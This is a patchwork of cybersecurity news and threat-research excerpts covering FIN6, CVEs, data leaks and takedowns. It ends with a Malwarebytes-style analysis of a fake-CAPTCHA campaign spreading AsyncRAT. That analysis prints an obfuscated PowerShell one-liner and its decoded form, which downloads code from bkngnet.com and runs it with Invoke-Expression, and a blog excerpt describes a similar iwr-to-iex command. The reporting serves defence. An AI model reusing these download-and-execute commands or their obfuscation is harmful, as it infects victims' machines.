This report uncovers a set of related threat clusters linked to PurpleHaze and ShadowPad operators targeting organizations, including cybersecurity vendors.
Discover how the FIN6 cybercrime group, also known as Skeleton Spider, leverages trusted cloud services like AWS to deliver stealthy malware through fake job applications and resume-themed phishing campaigns. Learn about their tactics, infrastructure, and how to defend against these evolving threats.
Skeleton Spider, also known as FIN6, is a long-running financially motivated cybercrime group that has continually evolved its tactics to maximize impact and profit. While the group initially gained notoriety for point-of-sale (POS) breaches and large-scale payment card theft, it has since shifted to broader enterprise threats, including ransomware operations.
In recent years, FIN6 has sharpened its focus on social engineering campaigns that exploit professional trust. By posing as job seekers and initiating conversations through platforms like LinkedIn and Indeed, the group builds rapport with recruiters before delivering phishing messages that lead to malware. One of their preferred payloads is more_eggs, a stealthy JavaScript-based backdoor that facilitates credential theft, system access, and follow-on attacks, including ransomware deployment.
This research combines technical insights and practical analysis for both general audiences and cybersecurity professionals. We examine how FIN6 uses trusted cloud services, such as AWS, to host malicious infrastructure, evade detection, and ultimately deploy malware through socially engineered lures.
Russia’s Federal Security Service (FSB) has learned to intercept messages sent by Russians to bots or feedback accounts associated with certain Ukrainian Telegram channels, potentially exposing anyone communicating with such outlets to treason charges, Russian human rights NGO First Department warned on Friday.
Russia’s principal domestic intelligence agency has gained access to correspondence made with Ukrainian Telegram channels including Crimean Wind and Vision Vishnun, according to First Department, which said that the FSB’s hacking of Ukrainian Telegram channels had come about during a 2022 investigation into the Ukrainian intelligence agencies “gathering information that threatens the security of the Russian Federation” via messengers and social networks including Telegram.
The case is being handled by the FSB’s investigative department, though no suspects or defendants have been named in the case, according to First Department.
When the FSB identifies individual Russian citizens who have communicated with or transmitted funds to certain Ukrainian Telegram channels, it contacts the FSB office in their region, which then typically opens a criminal case for treason against the implicated person.
“We know that by the time the defendants in cases of ‘state treason’ are detained, the FSB is already in possession of their correspondence. And the fact that neither defendants nor a lawyer are named in the main case allows the FSB to hide how exactly it goes about gaining access to that correspondence,” First Department said.
A high-severity vulnerability was uncovered in Splunk Universal Forwarder for Windows that compromises directory access controls.
The flaw, designated CVE-2025-20298 with a CVSSv3.1 score of 8.0, affects multiple versions of the software and poses significant security risks to enterprise environments relying on Splunk’s data forwarding capabilities.
The vulnerability stems from incorrect permission assignment during the installation or upgrade of Universal Forwarder for Windows.
This security flaw is classified under CWE-732 (Incorrect Permission Assignment for Critical Resource), indicating a fundamental issue with access control mechanisms.
The vulnerability manifests when Universal Forwarder for Windows versions below 9.4.2, 9.3.4, 9.2.6, and 9.1.9 are newly installed or upgraded to an affected version.
During these processes, the installation directory—typically located at C:\Program Files\SplunkUniversalForwarder—receives incorrect permissions that allow non-administrator users to access the directory and all its contents.
This represents a significant breach of the principle of least privilege, a cornerstone of enterprise security frameworks.
The CVSSv3.1 vector CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H indicates that while the attack requires low-level privileges and user interaction, it can result in high impact across confidentiality, integrity, and availability.
The network attack vector component suggests potential for remote exploitation under certain circumstances.
The scope of this vulnerability is considerable, affecting four major release branches of Splunk Universal Forwarder for Windows.
Specifically, the vulnerability impacts versions in the 9.4 branch below 9.4.2, the 9.3 branch below 9.3.4, the 9.2 branch below 9.2.6, and the 9.1 branch below 9.1.9.
Socket's Threat Research Team discovered two malicious npm packages that masquerade as legitimate utilities while implementing backdoors designed to destroy production systems. Published by npm user botsailer using email anupm019@gmail[.]com, both express-api-sync and system-health-sync-api secretly register hidden endpoints that, when triggered with the right credentials, execute file deletion commands that wipe out entire application directories.
Throughout late 2024 and early 2025, iVerify detected anomalous activity on iPhones belonging to individuals affiliated with political campaigns, media organizations, A.I. companies and governments operating in the United States and European Union.
Specifically, we detected exceedingly rare crashes typically associated with sophisticated zero-click attacks via iMessage – an exploitation technique previously unobserved in any systematic way in the United States. Subsequent forensic examination of several of these devices ultimately revealed a previously unknown vulnerability in the “imagent” process which, owing to its relative position in the operating system and functionality, would provide attackers a primitive for further exploitation. This vulnerability was patched by Apple in iOS 18.3. We’ve dubbed this vulnerability NICKNAME.
In the course of our investigation, we discovered evidence suggesting – but not definitively proving – this vulnerability was exploited in targeted attacks as recently as March of this year. Specifically, we learned that Apple sent Threat Notifications to at least one device belonging to a senior government official in the EU on which we saw the highly anomalous crashes. Likewise, one device demonstrated behavior frequently associated with successful exploitation, specifically the creation and deletion of iMessage attachments in bulk within a matter of seconds on several occasions after an anomalous crash. We only observed these crashes on devices belonging to extremely high value targets. And these crashes constituted only .0001% of the crash log telemetry taken from a sample of 50,000 iPhones.
Today, the Linux Foundation, the nonprofit organization enabling mass innovation through open source, announced the launch of the FAIR Package Manager project, a federated and independent repository of trusted plugins and themes for web hosts, commercial plugin and tool developers in the WordPress ecosystem and end users. The FAIR Package Manager project, through its contributors, creates net new interoperability, making the web publishing ecosystem more innovative and accessible for all.
Vendor-neutral package management for content management systems like WordPress provides critical universal infrastructure that addresses the new realities of content, e-commerce and AI. The FAIR Package Manager project helps make plugins and tools more discoverable and lets developers choose where to source those plugins depending on the needs of their supply chain. By giving commercial plugin developers, hosts, and application developers more options to control the tools they rely on, the FAIR Package Manager project promotes innovation and protects business continuity.
“The FAIR Package Manager project paves the way for the stability and growth of open source content management, giving contributors and businesses additional options governed by a neutral community,” said Jim Zemlin, Executive Director of the Linux Foundation. ”We look forward to the growth in community and contributions this important project attracts.”
DNS4EU, an EU-based DNS resolution service created to strengthen European Union’s digital sovereignty, has become reality.
What is DNS?
The Domain Name System (DNS) “translates” human-readable domain names into IP addresses and back, and is essential for accessing websites.
Most users use DNS resolver services provided by their internet service provider (because they are automatically configured) or a public DNS provider like Google or Cloudflare.
DNS4EU is meant to be a resilient, fast, reliable, secure, privacy-friendly and EU-based alternative for those.
The goal of DNS4EU
DNS4EU is an initiative co-funded by the European Union and supported by the European Union Agency for Cybersecurity (ENISA), though the service is expected to be commercialised, “since it has to be sustainable without operational costs from the EU after 2025.”
It is developed and managed by a consortium of private cybersecurity companies, CERTs, and academic institutions from 10 European Union countries, with Czech cybersecurity company Whalebone as its leader.
“The DNS4EU initiative aligns with the EU’s strategic goal of enhancing its digital autonomy by providing an alternative to the existing public DNS services provided by non-european entities,” says the group.
One of the largest food distributors in the U.S. reported a cyberattack to regulators on Monday, explaining that the incident has disrupted its operations and ability to fulfil customer orders.
United Natural Foods released a public statement and filed documents with the U.S. Securities and Exchange Commission (SEC) saying the cyberattack began on June 5.
The statement said the Rhode Island-based company identified unauthorized activity on its systems on Thursday, prompting officials to take systems offline. The action “has temporarily impacted the Company’s ability to fulfill and distribute customer orders.”
“The incident has caused, and is expected to continue to cause, temporary disruptions to the Company’s business operations,” United Natural Foods said. “The Company has implemented workarounds for certain operations in order to continue servicing its customers where possible. The Company is continuing to work to restore its systems to safely bring them back online.”
Law enforcement has been notified and the company said it has hired a cybersecurity firm to remediate the incident. The investigation into the attack “remains ongoing and is in its early stages.”
The press statement published on Monday said the company is working closely with “customers, suppliers, and associates” to minimize the disruption. The company did not respond to requests for comment.
United Natural Foods is the main supplier for Whole Foods and is considered the largest health and specialty food distributor in the United States and Canada. The company reported $8.2 billion in net sales last quarter.
In an effort to evade detection, cybercriminals are increasingly turning to “residential proxy” services that cover their tracks by making it look like everyday online activity.
For years, gray-market services known as “bulletproof” hosts have been a key tool for cybercriminals looking to anonymously maintain web infrastructure with no questions asked. But as global law enforcement scrambles to crack down on digital threats, they have developed strategies for getting customer information from these hosts and have increasingly targeted the people behind the services with indictments. At the cybercrime-focused conference Sleuthcon in in Arlington, Virginia, today, researcher Thibault Seret outlined how this shift has pushed both bulletproof hosting companies and criminal customers toward an alternative approach.
Rather than relying on web hosts to find ways of operating outside law enforcement's reach, some service providers have turned to offering purpose-built VPNs and other proxy services as a way of rotating and masking customer IP addresses and offering infrastructure that either intentionally doesn't log traffic or mixes traffic from many sources together. And while the technology isn't new, Seret and other researchers emphasized to WIRED that the transition to using proxies among cybercrminals over the last couple of years is significant.
As AI and digital technologies advance, the European cyber threat landscape continues to evolve, presenting new challenges that require stronger partnerships and enhanced solutions. Ransomware groups and state-sponsored actors from Russia, China, Iran, and North Korea continue to grow in scope and sophistication, and European cyber protection cannot afford to stand still.
That is why, today, in Berlin, we are announcing a new Microsoft initiative to expand our longstanding work to help defend Europe’s cybersecurity. Implementing one of the five European Digital Commitments I shared in Brussels five weeks ago, we are launching a new European Security Program that adds to the company’s longstanding global Government Security Program.
This new program expands the geographic reach of our existing work and adds new elements that will become critical to Europe’s protection. It puts AI at the center of our work as a tool to protect traditional cybersecurity needs and strengthens our protection of digital and AI infrastructure.
We are launching the European Security Program with three new elements:
UNC6040 uses vishing to impersonate IT support, deceiving victims into granting access to their Salesforce instances.
Google Threat Intelligence Group (GTIG) is tracking UNC6040, a financially motivated threat cluster that specializes in voice phishing (vishing) campaigns specifically designed to compromise organizations' Salesforce instances for large-scale data theft and subsequent extortion. Over the past several months, UNC6040 has demonstrated repeated success in breaching networks by having its operators impersonate IT support personnel in convincing telephone-based social engineering engagements. This approach has proven particularly effective in tricking employees, often within English-speaking branches of multinational corporations, into actions that grant the attackers access or lead to the sharing of sensitive credentials, ultimately facilitating the theft of organization’s Salesforce data. In all observed cases, attackers relied on manipulating end users, not exploiting any vulnerability inherent to Salesforce.
A prevalent tactic in UNC6040's operations involves deceiving victims into authorizing a malicious connected app to their organization's Salesforce portal. This application is often a modified version of Salesforce’s Data Loader, not authorized by Salesforce. During a vishing call, the actor guides the victim to visit Salesforce's connected app setup page to approve a version of the Data Loader app with a name or branding that differs from the legitimate version. This step inadvertently grants UNC6040 significant capabilities to access, query, and exfiltrate sensitive information directly from the compromised Salesforce customer environments. This methodology of abusing Data Loader functionalities via malicious connected apps is consistent with recent observations detailed by Salesforce in their guidance on protecting Salesforce environments from such threats.
In some instances, extortion activities haven't been observed until several months after the initial UNC6040 intrusion activity, which could suggest that UNC6040 has partnered with a second threat actor that monetizes access to the stolen data. During these extortion attempts, the actor has claimed affiliation with the well-known hacking group ShinyHunters, likely as a method to increase pressure on their victims.
Hackers leak data of 88 million AT&T customers with decrypted SSNs; latest breach raises questions about links to earlier Snowflake-related attack.
Hackers have leaked what they claim is AT&T’s database which was reportedly stolen by the ShinyHunters group in April 2024 after they exploited major security flaws in the Snowflake cloud data platform. But is this really the Snowflake-linked data? We took a closer look.
As seen by the Hackread.com research team, the data was first posted on a well-known Russian cybercrime forum on May 15, 2025. It was re-uploaded on the same forum on June 3, 2025, after which it began circulating among other hackers and forums.
After analyzing the leaked data, we found it contains a detailed set of personal information. Each of these data points poses a serious privacy risk on its own, but together, they create full identity profiles that could be exploited for fraud or identity theft. The data includes:
Full names
Date of birth
Phone numbers
Email addresses
Physical addresses
44 Million Social Security Numbers (SSN) (43,989,219 in total)
Hackers are actively exploiting CVE-2025-49113, a critical vulnerability in the widely used Roundcube open-source webmail application that allows remote execution.
The security issue has been present in Roundcube for over a decade and impacts versions of Roundcube webmail 1.1.0 through 1.6.10. It received a patch on June 1st.
It took attackers just a couple of days to reverse engineer the fix, weaponize the vulnerability, and start selling a working exploit on at least one hacker forum.
Roundcube is one of the most popular webmail solutions as the product is included in offers from well-known hosting providers such as GoDaddy, Hostinger, Dreamhost, or OVH.
"Email armageddon"
CVE-2025-49113 is a post-authentication remote code execution (RCE) vulnerability that received a critical severity score of 9.9 out of 10 and is described as “email armageddon.”
It was discovered and reported by Kirill Firsov, the CEO of the cybersecurity company FearsOff, who decided to publish the technical details before the end of the responsible disclosure period because an exploit had become available.
The U.S. Attorney’s Office for the Eastern District of Virginia announced today the seizure of approximately 145 darknet and traditional internet domains, and cryptocurrency funds associated with the BidenCash marketplace. The operators of the BidenCash marketplace use the platform to simplify the process of buying and selling stolen credit cards and associated personal information.
BidenCash commenced operations in March 2022. BidenCash administrators charged a fee for every transaction conducted on the website. The BidenCash marketplace had grown to support over 117,000 customers, facilitated the trafficking of over 15 million payment card numbers and personally identifiable information, and generated over $17 million in revenue during its operations.
The BidenCash marketplace domains will no longer be operational and will be redirected to a U.S. law enforcement-controlled server, preventing future criminal activity on these sites. The marketplace also sold compromised credentials that could be used to access computers without proper authorization.
Between October 2022 and February 2023, the BidenCash marketplace published 3.3 million individual stolen credit cards for free to promote the use of their services. The stolen data included credit card numbers, expiration dates, Card Verification Value (CVV) numbers, account holder names, addresses, email addresses, and phone numbers.
According to court records, the United States obtained court authorization to seize cryptocurrency funds that BidenCash marketplace used to receive illicit proceeds from its illegal sales.
Erik S. Siebert, U.S. Attorney for the Eastern District of Virginia; John Szydlik, Resident Agent in Charge of the U.S. Secret Service’s Frankfurt Resident Office; and Philip Russell, Acting Special Agent in Charge of the FBI Albuquerque Field Office, made the announcement.
This case was investigated by the U.S. Secret Service’s Frankfurt Resident Office, the U.S. Secret Service’s Cyber Investigative Section, and the FBI Albuquerque Field Office.
The Department of Justice thanks the Dutch National High Tech Crime Unit, The Shadowserver Foundation and Searchlight Cyber for their assistance with the investigation.
The government is represented by Assistant U.S. Attorney Zoe Bedell in these matters.
Cisco has released patches to address three vulnerabilities with public exploit code in its Identity Services Engine (ISE) and Customer Collaboration Platform (CCP) solutions.
The most severe of the three is a critical static credential vulnerability tracked as CVE-2025-20286, found by GMO Cybersecurity's Kentaro Kawane in Cisco ISE. This identity-based policy enforcement software provides endpoint access control and network device administration in enterprise environments.
The vulnerability is due to improperly generated credentials when deploying Cisco ISE on cloud platforms, resulting in shared credentials across different deployments.
Unauthenticated attackers can exploit it by extracting user credentials from Cisco ISE cloud deployments and using them to access installations in other cloud environments. However, as Cisco explained, threat actors can exploit this flaw successfully only if the Primary Administration node is deployed in the cloud.
"A vulnerability in Amazon Web Services (AWS), Microsoft Azure, and Oracle Cloud Infrastructure (OCI) cloud deployments of Cisco Identity Services Engine (ISE) could allow an unauthenticated, remote attacker to access sensitive data, execute limited administrative operations, modify system configurations, or disrupt services within the impacted systems," the company explained.
Le Département fédéral de la Défense a ouvert une enquête administrative sur une présumée transmission d'informations sensibles du Service de renseignement de la Confédération (SRC) à la Russie entre 2015 et 2020, notamment via l'entreprise russe de cybersécurité Kaspersky. Cette affaire de fuites de données sensibles apparaît dans un rapport interne du SRC que SRF Investigativ a pu consulter.
En novembre 2020, des services secrets alliés mettent en garde le service de renseignement suisse de potentielles fuites d'informations sensibles aux services secrets russes. Après enquête, le SRC reconnaît ces allégations de "partage illégal de données" dans un rapport secret datant de 2021, que SRF Investigativ a pu consulter. Selon ce rapport, un agent des services de renseignement suisses aurait effectivement transmis des informations hautement sensibles à Kaspersky, une société russe de cybersécurité.
L'information aurait ensuite été divulguée aux services de renseignement russes via Kaspersky, d'après une deuxième agence de renseignement alliée, faisant courir "un risque de mise en danger de vies humaines". Les deux services de renseignement "amis", essentiels pour le travail du SRC et la sécurité de la Suisse, ont menacé de "cesser toute coopération avec le SRC" si l'employé mis en cause à la tête du service cyber du SRC continuait à y travailler.
Kaspersky, le premier des "contacts réguliers" de l'équipe cyber du SRC
Kaspersky a déjà été accusé à plusieurs reprises de collaborer avec le Kremlin et ses services secrets. L'entreprise, avec laquelle le SRC a collaboré, est donc évitée depuis des années par les services gouvernementaux de nombreux pays occidentaux.
Mais pour l'équipe cyber du SRC, l'entreprise Kaspersky arrive en tête d'un rapport classé sous la rubrique "Contacts réguliers". La société de cybersécurité serait "essentielle" pour le travail de l'équipe cyber, avait d'ailleurs déclaré l'ancien chef de cette équipe mis en cause par les services de renseignement alliés. Selon lui, "le SRC ne dispose pas de l'expertise et des ressources suffisantes pour détecter de manière indépendante et préventive les activités de pira
Hello and welcome back to another blog post. After some time of absence due to a lot of changes in my personal life ( finished university, started a new job, etc), I am happy to finally be able to present something new.
Chapter 1: Captcha-verified Victim
This story starts with a message by one of my long time internet contacts:
Figure 1: Shit hit the Fan
I assume, some of you can already tell from this message alone that something terrible had just happend to him.
The legitimate website of the German Association for International Law had redirected him to an apparent Cloudflare Captcha site asking him to execute a Powershell command on device that does a Webrequest (iwr = Invoke-WebRequest) to a remote website (amoliera[.]com) and then pipes the response into “iex” which stands for Invoke-Expression.
Thats a text-book example for a so called FakeCaptcha attack.
For those of you that do not know what the FakeCaptcha attack technique is, let me give you a short primer:
A Captcha in itself is a legitimate method Website Owners use to differentiate between bots (automated traffic) and real human users. It often involves at-least clicking a button but can additionally require the website visitor to solve different form of small tasks like clicking certain images out of a collection of random images or identifying a bunch of obscurely written letters. The goal is to only let users visit the website that are able to solve these tasks, which are often designed to be hard for computers but easy for human beings. Well, most of the times.
Over on SuspectFile, @amvinfe has been busy exposing Akira’s false promises to its victims. In two posts this week, he reports on what happened with one business in New Jersey and one in Germany that decided to pay Akira’s ransom demands. He was able to report on it all because Akira failed to secure its negotiations chat server. Anyone who knows where to look can follow along if a victim contacts Akira to try to negotiate any payment for a decryptor or data deletion.
In one case, the victim paid Akira $200k after repeatedly asking for — and getting — assurances that this would all be kept confidential. In the second case, Akira demanded $6.9 million but eventually accepted that victim’s offer of $800k. The negotiations made clear that Akira had read the terms of the victim’s cyberinsurance policy and used that to calculate their demands.
If the two victims hoped to keep their names or their breaches out of the news, they may have failed. Although SuspectFile did not name them, others with access to the chats might report on the incidents. Anyone who read the chats would possess the file lists of everything Akira claimed to have exfiltrated from each victim. Depending on their file-naming conventions, filenames may reveal proprietary or sensitive information and often reveal the name of the victim.
So the take-home messages for current victims of Akira:
Akira has not been keeping its negotiations with you secure and confidential.
Paying Akira’s ransom demands is no guarantee that others will not obtain your data or find out about your breach.
Even just negotiating with Akira may be sufficient to provide researchers and journalists with data you do not want shared.
If you pay Akira and they actually give you accurate information about how they gained access and elevated privileges, you are now more at risk from other attackers while you figure out how to secure your network.
We found that cybercriminals are preparing for the impending holiday season with a redirect campaign leading to AsyncRAT.
Cybercriminals have started a campaign of redirecting links placed on gaming sites and social media—and as sponsored ads—that lead to fake websites posing as Booking.com. According to Malwarebytes research, 40% of people book travel through a general online search, creating a lot of opportunities for scammers.
The first signs of the campaign showed up mid-May and the final redirect destination changes every two to three days.
Following the links brings visitors to a familiar strategy where fake CAPTCHA websites hijack your clipboard and try to trick visitors into infecting their own device.
fake Captcha
fake Captcha prompt
As usual on these websites, by putting a checkmark in the fake Captcha prompt you’re giving the website permission to copy something to your clipboard.
Afterwards, the scammers involved will try to have the visitor execute a Run command on their computer. This type of prompt is never used in legitimate Captcha forms and should be immediately suspicious to all individuals.
instructions for the visitor
instructions to infect your own device
If you’re using Chrome, you may see this warning:
Chrome warns but for what?
Chrome issues a warning but it may the danger may be unclear to users
The warning is nice, but it’s not very clear what this warning is for, in my opinion.
Users of Malwarebytes’ Browser Guard will see this warning:
Browser Guard clipboard warning
Malwarebytes Browser Guard’s clipboard warning
“Hey, did you just copy something?
Heads up, your clipboard was just accessed from this website. Be sure you trust the owner before passing this someplace you don’t want it. Like a terminal or an email to your boss.”
Well, either way, don’t just discard these warnings. Even if you think you’re looking at an actual booking website, this is not the kind of instructions you’re expected to follow.
What the website just put on the clipboard may look like gobbledegook to some, though more experienced users will see the danger.
pOwERsheLl –N"O"p"rO" /w h -C"Om"ManD "$b"a"np = 'b"kn"g"n"et.com';$r"k"v = I"n"v"o"k"e-"R"e"stMethod -Uri $ba"n"p;I"nv"oke"-"E"xp"r"es"sion $r"k"v"
The cybercriminals used mixed casing, quote interruption, and variable name manipulation to hide their true intentions, but what it actually says (and does if you follow the instructions) is:
powershell -NoProfile -WindowStyle Hidden -Command "$banp = 'bkngnet.com'; $rkv = Invoke-RestMethod -Uri $banp; Invoke-Expression $rkv"
The malicious Captcha form tells the user to copy the content of the clipboard into the Windows Run dialog box and execute the instructions from the above command. When Browser Guard detects that the text copied to the clipboard contains this kind of potentially malicious command, it will add the phrase Suspicious Content at the front of the copied content which makes it an invalid command and the user will see a warning instead of having infected themselves.
Should a user fall for this without any protections enabled, the command will open a hidden powershell window to download and execute a file called ckjg.exe which in turn would download and execute a file called Stub.exe which is detected by Malwarebytes/ThreatDown as Backdoor.AsyncRAT.
Backdoor.AsyncRAT is a backdoor Trojan which serves as a Remote Access Tool (RAT) designed to remotely monitor and control other computers. In other words, it puts your device at the mercy of the person controlling the RAT.
The criminals can gather sensitive and financial information from infected devices which can lead to financial damages and even identity theft.
IOCs
The domains and subdomains we found associated with this campaign rotate quickly. From what I could retrace, they change the URL to the landing page every two to three days. But here is a list of recently active ones.
(booking.)chargesguestescenter[.]com
(booking.)badgustrewivers.com[.]com
(booking.)property-paids[.]com
(booking.)rewiewqproperty[.]com
(booking.)extranet-listing[.]com
(booking.)guestsalerts[.]com
(booking.)gustescharge[.]com
kvhandelregis[.]com
patheer-moreinfo[.]com
guestalerthelp[.]com
rewiewwselect[.]com
hekpaharma[.]com
bkngnet[.]com
partnervrft[.]com
